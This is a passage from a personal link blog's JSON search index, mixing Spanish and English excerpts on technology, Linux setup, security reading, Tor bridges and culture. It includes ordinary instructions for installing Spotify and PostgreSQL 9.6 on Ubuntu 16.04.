href=\"https://www.cyberciti.biz/tips/spice-up-your-unix-linux-shell-scripts.html\"\u003ecyberciti.biz\u003c/a\u003e\u003c/p\u003e","title":"10 Tools To Add Some Spice To Your UNIX/Linux Shell Scripts"},{"content":" Using a top-rated VPN is one of the best ways to protect your online privacy in today’s times. They also serve other purposes like website unblocking, remote access to company resources, bypassing censorship, etc. In this article, we’ve reviewed the top VPN services and listed their best features to help you make an informed decision while spending your hard-earned money.\n» Fossbytes | fossbytes.com\n","permalink":"http://karpoke.ignaciocano.com/2018/01/11/10-best-vpn-services-of-2019-top-vpn-provider-reviews-amp-buying-guide/","summary":"\u003cblockquote\u003e\n\u003cp\u003eUsing a top-rated VPN is one of the best ways to protect your online privacy\nin today’s times. They also serve other purposes like website unblocking,\nremote access to company resources, bypassing censorship, etc. In this\narticle, we’ve reviewed the top VPN services and listed their best features\nto help you make an informed decision while spending your hard-earned money.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Fossbytes | \u003ca href=\"https://fossbytes.com/best-vpn-services-providers-review/\"\u003efossbytes.com\u003c/a\u003e\u003c/p\u003e","title":"10 Best VPN Services Of 2019: Top VPN Provider Reviews \u0026amp; Buying Guide"},{"content":" El barco en el que Teseo y la juventud de Atenas regresaron de Creta tenía treinta remos, y fue conservado por los atenienses incluso hasta la época de Demetrio de Falero, ya que retiraron los viejos tablones a medida que se descomponían e introdujeron madera nueva y más resistente en su lugar, tanto que este barco se convirtió en un ejemplo permanente entre los filósofos, para la pregunta lógica de las cosas que crecen, un lado sostiene que el barco sigue siendo el mismo, y el otro afirma que no.\n» bbc.com | bbc.com\n","permalink":"http://karpoke.ignaciocano.com/2018/01/11/3-paradojas-que-le-quitan-el-sueno-a-los-matematicos-y-filosofos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl barco en el que Teseo y la juventud de Atenas regresaron de Creta tenía\ntreinta remos, y fue conservado por los atenienses incluso hasta la época de\nDemetrio de Falero, ya que retiraron los viejos tablones a medida que se\ndescomponían e introdujeron madera nueva y más resistente en su lugar, tanto\nque este barco se convirtió en un ejemplo permanente entre los filósofos,\npara la pregunta lógica de las cosas que crecen, un lado sostiene que el\nbarco sigue siendo el mismo, y el otro afirma que no.\u003c/p\u003e","title":"3 paradojas que le quitan el sueño a los matemáticos y filósofos"},{"content":" I recently presented a talk at the AWS Community Day in Bangalore. The tweet following the talk became my most popular tweet ever and I received quite a few requests for more details. For the last 10 years, I have had the chance to work in companies that embraced the cloud, and in particular AWS. This two-part blog post is an attempt to share that experience with you. Hope you enjoy!\n» Hacker Noon | hackernoon.com\n","permalink":"http://karpoke.ignaciocano.com/2018/01/10/10-lessons-from-10-years-of-aws-part-1/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI recently presented a talk at the AWS Community Day in Bangalore. The tweet\nfollowing the talk became my most popular tweet ever and I received quite a\nfew requests for more details.\nFor the last 10 years, I have had the chance to work in companies that\nembraced the cloud, and in particular AWS. This two-part blog post is an\nattempt to share that experience with you. Hope you enjoy!\u003c/p\u003e","title":"10 Lessons from 10 Years of AWS (part 1)"},{"content":" Es hablar de anime y a mucha gente le salen sarpullidos. Son muchos los que reniegan de todo un universo sin haberse adentrado nunca él. Un universo lleno de mil mundos distintos en el que puedes encontrar amor, aventura, ciencia ficción, acción, drama, terror, comedia, fantasía… Un universo reinado por Studio Ghibli y su primer espada Hayao Miyazaki. Un universo sin límites que cada año nos sorprende con auténticas joyas.\n» C\u0026rsquo;mon! Murcia | cmonmurcia.com\n","permalink":"http://karpoke.ignaciocano.com/2018/01/05/10-peliculas-para-adentrarse-en-el-mundo-del-anime/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEs hablar de anime y a mucha gente le salen sarpullidos. Son muchos los que\nreniegan de todo un universo sin haberse adentrado nunca él. Un universo\nlleno de mil mundos distintos en el que puedes encontrar amor, aventura,\nciencia ficción, acción, drama, terror, comedia, fantasía… Un universo\nreinado por Studio Ghibli y su primer espada Hayao Miyazaki. Un universo sin\nlímites que cada año nos sorprende con auténticas joyas.\u003c/p\u003e","title":"10 películas para adentrarse en el mundo del anime"},{"content":" Llegan las navidades, aunque comercialmente ya empezaron hace casi un mes, y que mejor que dar ideas para regalar o ser regalado. ¿No sabes que encargarle a los reyes magos? No te preocupes, vamos a comentar los 10 libros de seguridad informática que más leemos en Hispasec. Esos que yacen desgastados en los escritorios de auditoría, malware o el equipo 24x7 de Antifraude, nuestros incansables vigilantes. Leer y hacer son dos palabras claves en la construcción de un buen profesional, sea de la rama que sea. La formación es importante y una de las cosas que siempre ha estado presente en Hispasec es que el personal no le falte lectura, alimento para el cerebro.\n» una-al-dia Hispasec | unaaldia.hispasec.com\n","permalink":"http://karpoke.ignaciocano.com/2017/12/22/10-libros-de-seguridad-informatica-para-regalar-estas-navidades/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLlegan las navidades, aunque comercialmente ya empezaron hace casi un mes, y\nque mejor que dar ideas para regalar o ser regalado. ¿No sabes que\nencargarle a los reyes magos? No te preocupes, vamos a comentar los 10\nlibros de seguridad informática que más leemos en Hispasec. Esos que yacen\ndesgastados en los escritorios de auditoría, malware o el equipo 24x7 de\nAntifraude, nuestros incansables vigilantes. Leer y hacer son dos palabras\nclaves en la construcción de un buen profesional, sea de la rama que sea.\nLa formación es importante y una de las cosas que siempre ha estado presente\nen Hispasec es que el personal no le falte lectura, alimento para el\ncerebro.\u003c/p\u003e","title":"10 libros de seguridad informática para regalar estas navidades"},{"content":" In this age of smartphones and computers, the electronic devices have become our true companions. For technology enthusiasts and geeks, this is even truer. However, there are only a handful of movies that showcase the geek and hacker culture in a true sense. In this article, I’ve tried to compile my favorite and best hacking movies that you shouldn’t miss.\n» Fossbytes | fossbytes.com\n","permalink":"http://karpoke.ignaciocano.com/2017/12/10/10-best-hacking-movies-you-need-to-watch-in-2018/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn this age of smartphones and computers, the electronic devices have become\nour true companions. For technology enthusiasts and geeks, this is even\ntruer. However, there are only a handful of movies that showcase the geek\nand hacker culture in a true sense. In this article, I’ve tried to compile\nmy favorite and best hacking movies that you shouldn’t miss.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Fossbytes | \u003ca href=\"https://fossbytes.com/best-hacking-movies-geek/\"\u003efossbytes.com\u003c/a\u003e\u003c/p\u003e","title":"10 Best Hacking Movies You Need To Watch In 2018"},{"content":" El español es el idioma oficial en más de 20 países del mundo y se calcula que hay alrededor de 490 millones de hispanohablantes en todo el planeta. Una lengua tan extendida por fuerza ha de tener muchas peculiaridades. Te explicamos 10 curiosidades del idioma español que quizá no conocías. 10 curiosidades del idioma español 1. ¿Español o castellano?\n» Supercurioso | supercurioso.com\n","permalink":"http://karpoke.ignaciocano.com/2017/12/08/10-curiosidades-del-idioma-espanol/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl español es el idioma oficial en más de 20 países del mundo y se calcula\nque hay alrededor de 490 millones de hispanohablantes en todo el planeta.\nUna lengua tan extendida por fuerza ha de tener muchas peculiaridades. Te\nexplicamos 10 curiosidades del idioma español que quizá no conocías. 10\ncuriosidades del idioma español 1. ¿Español o castellano?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Supercurioso | \u003ca href=\"https://supercurioso.com/curiosidades-del-idioma-espanol/\"\u003esupercurioso.com\u003c/a\u003e\u003c/p\u003e","title":"10 curiosidades del idioma español"},{"content":" La mente humana necesita saber sobre sí misma. Y en más de una ocasión, la búsqueda de ese conocimiento provocó que factores como la ética y la moral caigan a un plano inferior. En las últimas décadas se han desarrollado diferentes experimentos que de ser reproducidos en la actualidad encenderían más de una alarma, y hoy queremos repasar varios de ellos. Si bien no todos son considerados «malos»\n» NeoTeo | neoteo.com\n","permalink":"http://karpoke.ignaciocano.com/2017/12/06/10-experimentos-psicologicos-que-revelan-la-verdadera-naturaleza-humana/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa mente humana necesita saber sobre sí misma. Y en más de una ocasión, la búsqueda de ese conocimiento provocó que factores como la ética y la moral caigan a un plano inferior. En las últimas décadas se han desarrollado diferentes experimentos que de ser reproducidos en la actualidad encenderían más de una alarma, y hoy queremos repasar varios de ellos. Si bien no todos son considerados «malos»\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» NeoTeo | \u003ca href=\"http://www.neoteo.com/10-experimentos-psicologicos-que-revelan-la-verdadera-naturaleza-humana/\"\u003eneoteo.com\u003c/a\u003e\u003c/p\u003e","title":"10 experimentos psicológicos que revelan la verdadera naturaleza humana"},{"content":" What is file globbing in Linux? File globbing is a feature provided by the UNIX/Linux shell to represent multiple filenames by using special characters called wildcards with a single file name.\n» http://feeds.feedburner.com/TheLinuxJuggernaut | linuxnix.com\n","permalink":"http://karpoke.ignaciocano.com/2017/12/02/10-file-globbing-examples-in-linux-unix/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhat is file globbing in Linux? File globbing is a feature provided by the\nUNIX/Linux shell to represent multiple filenames by using special characters\ncalled wildcards with a single file name.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://feeds.feedburner.com/TheLinuxJuggernaut\"\u003ehttp://feeds.feedburner.com/TheLinuxJuggernaut\u003c/a\u003e | \u003ca href=\"https://www.linuxnix.com/10-file-globbing-examples-linux-unix/\"\u003elinuxnix.com\u003c/a\u003e\u003c/p\u003e","title":"10 File Globbing examples in Linux/Unix"},{"content":" SSH is the most popular and secure method for managing Linux servers remotely. One of the challenges with remote server management is connection speeds, especially when it comes to session creation between the remote and local machines.\n» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | tecmint.com\n","permalink":"http://karpoke.ignaciocano.com/2017/11/29/4-ways-to-speed-up-ssh-connections-in-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSSH is the most popular and secure method for managing Linux servers\nremotely. One of the challenges with remote server management is connection\nspeeds, especially when it comes to session creation between the remote and\nlocal machines.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tecmint: Linux Howtos, Tutorials \u0026amp; Guides | \u003ca href=\"https://www.tecmint.com/speed-up-ssh-connections-in-linux/\"\u003etecmint.com\u003c/a\u003e\u003c/p\u003e","title":"4 Ways to Speed Up SSH Connections in Linux"},{"content":" Adding a simple tooltip into your page isn’t hard. You can find a bunch of free tooltip plugins and JS scripts that can help with this. But pure CSS is another option, and it’s quickly becoming the preferred choice for many web designers. If you’re looking for CSS tooltips, then this collection should have something for you.\n» Speckyboy Design Magazine | speckyboy.com\n","permalink":"http://karpoke.ignaciocano.com/2017/11/21/10-free-css-tooltip-snippets-to-save-time-on-your-web-projects/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAdding a simple tooltip into your page isn’t hard. You can find a bunch of\nfree tooltip plugins and JS scripts that can help with this. But pure CSS is\nanother option, and it’s quickly becoming the preferred choice for many web\ndesigners. If you’re looking for CSS tooltips, then this collection should\nhave something for you.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Speckyboy Design Magazine | \u003ca href=\"https://speckyboy.com/free-css-tooltip-snippets/\"\u003especkyboy.com\u003c/a\u003e\u003c/p\u003e","title":"10 Free CSS Tooltip Snippets To Save Time On Your Web Projects"},{"content":" Once you get over the learning curve, there is nothing like LaTex. Here are the best LaTex editors for Linux and other systems. What is LaTeX? LaTeX is a document preparation system. Unlike plain text editor, you can’t just write a plain text using LaTeX editors. Here, you will have to utilize LaTeX commands in order to manage the content of the document.\n» It\u0026rsquo;s FOSS | itsfoss.com\n","permalink":"http://karpoke.ignaciocano.com/2017/11/20/10-best-latex-editors-for-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOnce you get over the learning curve, there is nothing like LaTex. Here are\nthe best LaTex editors for Linux and other systems. What is LaTeX? LaTeX is\na document preparation system. Unlike plain text editor, you can’t just\nwrite a plain text using LaTeX editors. Here, you will have to utilize LaTeX\ncommands in order to manage the content of the document.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» It\u0026rsquo;s FOSS | \u003ca href=\"https://itsfoss.com/latex-editors-linux/\"\u003eitsfoss.com\u003c/a\u003e\u003c/p\u003e","title":"10 Best LaTeX Editors For Linux"},{"content":" El creador de la psicología analítica, el psiquiatra suizo Carl Jung propuso que las narraciones míticas de viajes iniciáticos, como los de Marco Polo, Ulises o Hércules, pueden ser entendidas como expresiones simbólicas de un proceso de transformación psíquica que todas las personas se ven abocadas a desplegar a lo largo de la vida. Jung denominó este proceso como viaje del héroe o proceso de individuación.\n» La Mente es Maravillosa | lamenteesmaravillosa.com\n","permalink":"http://karpoke.ignaciocano.com/2017/11/15/el-viaje-del-heroe-y-los-arquetipos-de-la-migracion/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl creador de la psicología analítica, el psiquiatra suizo Carl Jung propuso\nque las narraciones míticas de viajes iniciáticos, como los de Marco Polo,\nUlises o Hércules, pueden ser entendidas como expresiones simbólicas de un\nproceso de transformación psíquica que todas las personas se ven abocadas a\ndesplegar a lo largo de la vida. Jung denominó este proceso como viaje del\nhéroe o proceso de individuación.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» La Mente es Maravillosa | \u003ca href=\"https://lamenteesmaravillosa.com/el-viaje-del-heroe-y-los-arquetipos-la-migracion\"\u003elamenteesmaravillosa.com\u003c/a\u003e\u003c/p\u003e","title":"El viaje del héroe y los arquetipos de la migración"},{"content":" I run a workshop titled Hack Yourself First in which people usually responsible for building web apps get to try their hand at breaking them. As it turns out, breaking websites is a heap of fun (with the obvious caveats) and people really get into the exercises. The first one that starts to push people into territory that\u0026rsquo;s usually unfamiliar to builders is the module on XSS.\n» Troy Hunt\u0026rsquo;s Blog | troyhunt.com\n","permalink":"http://karpoke.ignaciocano.com/2017/11/15/locking-down-your-website-scripts-with-csp-hashes-nonces-and-report-uri/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI run a workshop titled Hack Yourself First in which people usually\nresponsible for building web apps get to try their hand at breaking them. As\nit turns out, breaking websites is a heap of fun (with the obvious caveats)\nand people really get into the exercises. The first one that starts to push\npeople into territory that\u0026rsquo;s usually unfamiliar to builders is the module on\nXSS.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Troy Hunt\u0026rsquo;s Blog | \u003ca href=\"https://www.troyhunt.com/locking-down-your-website-scripts-with-csp-hashes-nonces-and-report-uri/\"\u003etroyhunt.com\u003c/a\u003e\u003c/p\u003e","title":"Locking Down Your Website Scripts with CSP, Hashes, Nonces and Report URI"},{"content":" Working code isn’t necessarily good code. Your code also needs to be easy to read, understand, and modify. It needs clarity, and to achieve that, it has to be organized well, with careful planning and proper separation of ideas taking place before you even open your code editor. Coding for clarity is something that separates the great developers from the merely good, and there are a few basic principles that can set you on that path.\n» Brandon Gregory | alisapart.com\n","permalink":"http://karpoke.ignaciocano.com/2017/10/28/coding-with-clarity/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWorking code isn’t necessarily good code. Your code also needs to be easy to\nread, understand, and modify. It needs clarity, and to achieve that, it has\nto be organized well, with careful planning and proper separation of ideas\ntaking place before you even open your code editor. Coding for clarity is\nsomething that separates the great developers from the merely good, and there\nare a few basic principles that can set you on that path.\u003c/p\u003e","title":"Coding with clarity"},{"content":" ya en la década de los 80 había tecnologías anticopia en las películas. Una de las más populares fue Macrovision, que protegía los VHS haciendo que cuando se creasen copias estas fueran defectuosas. El sistema estuvo vigente durante varios años, e incluso acabó dando el salto al DVD.\n» Yúbal FM | xataka.com\n","permalink":"http://karpoke.ignaciocano.com/2017/10/22/asi-funcionaba-el-primer-gran-sistema-que-evitaba-que-hicieras-copias-de-vhs/","summary":"\u003cblockquote\u003e\n\u003cp\u003eya en la década de los 80 había tecnologías anticopia en las películas. Una\nde las más populares fue Macrovision, que protegía los VHS haciendo que\ncuando se creasen copias estas fueran defectuosas. El sistema estuvo vigente\ndurante varios años, e incluso acabó dando el salto al DVD.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Yúbal FM | \u003ca href=\"https://www.xataka.com/historia-tecnologica/asi-funcionaba-el-primer-gran-sistema-que-evitaba-que-hicieras-copias-de-vhs\"\u003exataka.com\u003c/a\u003e\u003c/p\u003e","title":"Así funcionaba el primer gran sistema que evitaba que hicieras copias de VHS"},{"content":" Transitioning all that information transparently involved planning and coordination. For each problem domain using persistent Redis, we considered the volume of operations, the structure of the data, and the different access patterns to predict the impact on our current MySQL capacity, and the need for provisioning new hardware.\nFor the majority of callsites, we replaced persistent Redis with GitHub::KV, a MySQL key/value store of our own built atop InnoDB, with features like key expiration. We were able to use GitHub::KV almost identically as we used Redis: from trending repositories and users for the explore page, to rate limiting to spammy user detection.\n» Bryana Knight and Miguel Fernández | github.com\n","permalink":"http://karpoke.ignaciocano.com/2017/01/14/moving-persistent-data-out-of-redis/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTransitioning all that information transparently involved planning and\ncoordination. For each problem domain using persistent Redis, we considered\nthe volume of operations, the structure of the data, and the different access\npatterns to predict the impact on our current MySQL capacity, and the need\nfor provisioning new hardware.\u003c/p\u003e\n\u003cp\u003eFor the majority of callsites, we replaced persistent Redis with GitHub::KV,\na MySQL key/value store of our own built atop InnoDB, with features like key\nexpiration. We were able to use GitHub::KV almost identically as we used\nRedis: from trending repositories and users for the explore page, to rate\nlimiting to spammy user detection.\u003c/p\u003e","title":"Moving persistent data out of Redis"},{"content":"Si queremos instalar el cliente de Spotify en Ubuntu Xenial Xerus, tan sólo tenemos que instalar la clave:\n$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys BBEBDCB318AD50EC6865090613B00F1FD2C19886 Executing: /tmp/tmp.imoQkQ9ZVV/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys BBEBDCB318AD50EC6865090613B00F1FD2C19886 gpg: solicitando clave D2C19886 de hkp servidor keyserver.ubuntu.com gpg: clave D2C19886: clave pública \u0026#34;Spotify Public Repository Signing Key \u0026lt;operations@spotify.com\u0026gt;\u0026#34; importada gpg: Cantidad total procesada: 1 gpg: importadas: 1 (RSA: 1) Añadimos el PPA oficial:\n$ echo \u0026#34;deb http://repository.spotify.com stable non-free\u0026#34; | sudo tee /etc/apt/sources.list.d/spotify.list Actualizamos e instalamos:\n$ sudo apt update $ sudo apt install spotify-client Referencias » spotify.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/15/instalar-spotify-en-ubuntu-16-04/","summary":"\u003cp\u003eSi queremos instalar el cliente de Spotify en Ubuntu Xenial Xerus, tan sólo\ntenemos que instalar la clave:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys BBEBDCB318AD50EC6865090613B00F1FD2C19886\nExecuting: /tmp/tmp.imoQkQ9ZVV/gpg.1.sh --keyserver\nhkp://keyserver.ubuntu.com:80\n--recv-keys\nBBEBDCB318AD50EC6865090613B00F1FD2C19886\ngpg: solicitando clave D2C19886 de hkp servidor keyserver.ubuntu.com\ngpg: clave D2C19886: clave pública \u0026#34;Spotify Public Repository Signing Key \u0026lt;operations@spotify.com\u0026gt;\u0026#34; importada\ngpg: Cantidad total procesada: 1\ngpg:               importadas: 1  (RSA: 1)\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAñadimos el PPA oficial:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ echo \u0026#34;deb http://repository.spotify.com stable non-free\u0026#34; |\nsudo tee /etc/apt/sources.list.d/spotify.list\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eActualizamos e instalamos:\u003c/p\u003e","title":"Instalar Spotify en Ubuntu 16.04"},{"content":"La versión de Postgresql que viene en los repositorios de Ubuntu Xenial Xerus es la 9.5. Si queremos instalar la 9.6, podemos recurrrir al PPA oficial.\nImportamos la clave:\n$ wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc | sudo apt-key add - Añadimos el PPA:\n$ echo \u0026#34;deb http://apt.postgresql.org/pub/repos/apt/ xenial-pgdg main\u0026#34; | sudo tee /etc/apt/sources.list.d/postgresql.list Actualizamos e instalamos:\n$ sudo apt update $ sudo apt install postgresql-9.6 postgresql-contrib Referencias » linoxide.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/13/instalar-postgresql-9-6-en-ubuntu-16-04/","summary":"\u003cp\u003eLa versión de Postgresql que viene en los repositorios de Ubuntu Xenial Xerus\nes la 9.5. Si queremos instalar la 9.6, podemos recurrrir al PPA oficial.\u003c/p\u003e\n\u003cp\u003eImportamos la clave:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc |\nsudo apt-key add -\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAñadimos el PPA:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ echo \u0026#34;deb http://apt.postgresql.org/pub/repos/apt/ xenial-pgdg main\u0026#34; |\nsudo tee /etc/apt/sources.list.d/postgresql.list\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eActualizamos e instalamos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo apt update\n$ sudo apt install postgresql-9.6 postgresql-contrib\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"referencias\"\u003eReferencias\u003c/h2\u003e\n\u003cp\u003e» \u003ca href=\"http://linoxide.com/tools/setup-postgresql-access-phppgadmin-ubuntu-16-04/\"\u003elinoxide.com\u003c/a\u003e\u003c/p\u003e","title":"Instalar Postgresql 9.6 en Ubuntu 16.04"},{"content":" It’s been a while since I started exploring the amazing language features in Python. At the beginning, it’s just a challenge I gave myself to practice using more language features instead of those I learned from other programming language. And things are just getting more fun! Not only the code become shorter and cleaner, but also code looks more structured and disciplined. I’ll get into those benefits more in this article.\n» Randy Daw-Ran Liou | medium.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/12/never-write-for-loops-again/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIt’s been a while since I started exploring the amazing language features in\nPython. At the beginning, it’s just a challenge I gave myself to practice\nusing more language features instead of those I learned from other\nprogramming language. And things are just getting more fun! Not only the code\nbecome shorter and cleaner, but also code looks more structured and\ndisciplined. I’ll get into those benefits more in this article.\u003c/p\u003e","title":"Never write for-loops again"},{"content":" Censors block Tor in two ways: they can block connections to the IP addresses of known Tor relays, and they can analyze network traffic to find use of the Tor protocol. Bridges are secret Tor relays—they don’t appear in any public list, so the censor doesn’t know which addresses to block. Pluggable transports disguise the Tor protocol by making it look like something else—for example like HTTP or completely random.\nThere are several pluggable transports, and it can be hard to know which one to use. If it is your first time, try obfs4: it is a randomizing transport that works for most people. If obfs4 doesn’t work, try fte. If that doesn’t work, it may mean that the default bridges are blocked, and you should get a custom bridge from bridges.torproject.org. If the custom bridge doesn’t work, try meek-azure or meek-amazon.\n» ssteele | torproject.org\n","permalink":"http://karpoke.ignaciocano.com/2016/12/11/tor-at-the-heart-bridges-and-pluggable-transports/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCensors block Tor in two ways: they can block connections to the IP addresses\nof known Tor relays, and they can analyze network traffic to find use of the\nTor protocol. Bridges are secret Tor relays—they don’t appear in any public\nlist, so the censor doesn’t know which addresses to block. Pluggable\ntransports disguise the Tor protocol by making it look like something\nelse—for example like HTTP or completely random.\u003c/p\u003e","title":"Tor at the heart: bridges and pluggable transports"},{"content":" Los punkis trajeron cambios a nivel estético: crestas de colores, tatuajes, botas militares, cazadoras de cuero, escarceos con las drogas y música que el grupo vasco Eskorbuto definiría en su momento como \u0026ldquo;antitodo\u0026rdquo;. En resumidas cuentas, a partir de 1977 el punk se convirtió en anarquía de la estética. Y cuando se añadieron ordenadores y redes a la mezcla para los años 90 del siglo pasado, entonces aparecieron los cyberpunks.\n» Sergio Agudo | genbeta.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/11/que-son-los-cypherpunks-y-por-que-son-tan-importanes-en-la-lucha-por-la-privacidad/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLos punkis trajeron cambios a nivel estético: crestas de colores, tatuajes,\nbotas militares, cazadoras de cuero, escarceos con las drogas y música que el\ngrupo vasco Eskorbuto definiría en su momento como \u0026ldquo;antitodo\u0026rdquo;. En resumidas\ncuentas, a partir de 1977 el punk se convirtió en anarquía de la estética. Y\ncuando se añadieron ordenadores y redes a la mezcla para los años 90 del\nsiglo pasado, entonces aparecieron los cyberpunks.\u003c/p\u003e","title":"Qué son los cypherpunks y por qué son tan importanes en la lucha por la privacidad"},{"content":" En el siguiente artículo vamos a ver, paso a paso, como montar una mini consola similar a la Mini NES Classic, pero a nuestro gusto, con la posibilidad de emular una larga lista de consolas, utilizando una Raspberry Pi, un ordenador de bajo consumo y bajo coste, y gran cantidad de software libre, por un precio de unos 70 euros como mínimo.\nLas características más interesantes de nuestra Raspberry Pi (aunque no las únicas) serán las siguientes:\nEmular juegos de múltiples consolas: NES, SNES, Gameboy, MegaDrive, PSX, PSP, N64\u0026hellip; Emular juegos «retro» de PC/MSDOS: DOSBox, ScummVM, ResidualVM, etc. Utilizarla de Media Center para reproducir películas, series, música, emisoras de radio\u0026hellip; Actualizable con capacidad de añadir futuras mejoras (e incluso overclockeable). Basado en GNU/Linux, por lo que puede usarse a modo de servidor, PC o sistema ligero. Posibilidad de jugar online con otros jugadores de Raspberry Pi (o emuladores en PC). Mecanismo de «retrologros» similar a los utilizados en Steam. Posibilidad de cargar shaders o filtros para emular efectos visuales o pantallas CRT. Posibilidad de instalar ports de juegos de otras plataformas trasladadas a RPi. Hay una buena colleción de ROMs en nicoblog.org.\n» Manz | emezeta.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/07/como-montar-una-mini-consola-con-raspberry-pi/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn el siguiente artículo vamos a ver, paso a paso, como montar una mini\nconsola similar a la Mini NES Classic, pero a nuestro gusto, con la\nposibilidad de emular una larga lista de consolas, utilizando una Raspberry\nPi, un ordenador de bajo consumo y bajo coste, y gran cantidad de software\nlibre, por un precio de unos 70 euros como mínimo.\u003c/p\u003e\n\u003cp\u003eLas características más interesantes de nuestra Raspberry Pi (aunque no las\núnicas) serán las siguientes:\u003c/p\u003e","title":"Cómo montar una mini consola con Raspberry Pi"},{"content":" Peter Seibel wrote that to maximize engineering effectiveness, “Let a thousand flowers bloom. Then rip 999 of them out by the roots.” Flowers, in how the metaphor applies to us, are code patterns — the myriad different functions, classes, styles, and idioms that developers use when writing code. At first, new flowers are welcome — maybe the new pattern seems easier to use, more scalable, more efficient, or more suited to some particular task than the old.\nAs a code base grows, and the flowers proliferate, however, it becomes clear which patterns work and which don’t. Suddenly, code patterns that were once beautiful new flowers become technical debt in need of removal. When that happens, it’s time to start ripping. Otherwise, since developers learn by reading (and occasionally copy-and-pasting) from existing code, the bad flowers and the technical debt that comes with them will continue to grow unchecked.\n» Evan H. | engineeringblog.yelp.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/07/undebt-how-we-refactored-3-million-lines-of-code/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePeter Seibel wrote that to maximize engineering effectiveness, “Let a\nthousand flowers bloom. Then rip 999 of them out by the roots.” Flowers,\nin how the metaphor applies to us, are code patterns — the myriad different\nfunctions, classes, styles, and idioms that developers use when writing\ncode. At first, new flowers are welcome — maybe the new pattern seems\neasier to use, more scalable, more efficient, or more suited to some\nparticular task than the old.\u003c/p\u003e","title":"Undebt: how we refactored 3 million lines of code"},{"content":" Hay un bazar en internet que se dedica a la compraventa de inteligencia artificial, esa que algunos temen por si se nos va de las manos. En los puestos de Algorithmia, este supermercado del siglo XXI, los desarrolladores web pueden añadir a su carrito virtual un fragmento de código capaz de reconocer formas y colores o analizar sentimientos pese a no comprenderlos.\nalgorithmia.com\n» Cristina Sánchez | yorokobu.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/07/se-vende-censor-de-desnudos-de-compras-por-un-mercadillo-de-algoritmos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHay un bazar en internet que se dedica a la compraventa de inteligencia\nartificial, esa que algunos temen por si se nos va de las manos. En los\npuestos de Algorithmia, este supermercado del siglo XXI, los desarrolladores\nweb pueden añadir a su carrito virtual un fragmento de código capaz de\nreconocer formas y colores o analizar sentimientos pese a no comprenderlos.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://algorithmia.com/\"\u003ealgorithmia.com\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Cristina Sánchez | \u003ca href=\"http://www.yorokobu.es/mercadillo-algoritmos/\"\u003eyorokobu.com\u003c/a\u003e\u003c/p\u003e","title":"Se vende censor de desnudos: de compras por un mercadillo de algoritmos"},{"content":" One of the major disciplines in computer science is parsing/formatting. This is the process of converting the external format of data (file formats, network protocols, hardware registers) into the internal format (the data structures that software operates on).\nIt should be a formal computer-science discipline, because it’s actually a lot more difficult than you’d expect. That’s because the majority of vulnerabilities in software that hackers exploit are due to parsing bugs. Since programmers don’t learn about parsing formally, they figure it out for themselves, creating ad hoc solutions that are prone to bugs. For example, programmers assume external buffers cannot be larger than internal ones, leading to buffer overflows.\n» Robert Graham | erratasec.com\n","permalink":"http://karpoke.ignaciocano.com/2016/12/07/how-to-teach-endian/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOne of the major disciplines in computer science is parsing/formatting. This\nis the process of converting the external format of data (file 